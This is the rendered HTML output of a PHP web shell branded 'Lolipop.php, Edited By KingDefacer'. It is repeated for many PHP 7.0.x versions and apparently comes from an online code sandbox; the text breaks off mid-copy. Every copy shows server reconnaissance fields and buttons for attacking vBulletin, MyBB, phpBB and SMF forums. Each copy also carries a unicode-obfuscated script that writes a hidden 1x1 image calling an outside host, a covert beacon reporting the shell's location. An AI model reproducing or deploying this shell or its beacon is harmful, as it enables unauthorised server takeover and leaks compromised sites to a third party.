</table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.14
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.14</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.13
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.13</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.12
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.12</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.11
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.11</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.10
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.10</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.9
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.9</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.8
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.8</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.7
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.7</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.6
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.6</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.5
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.5</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.4
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.4</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.3
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.3</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 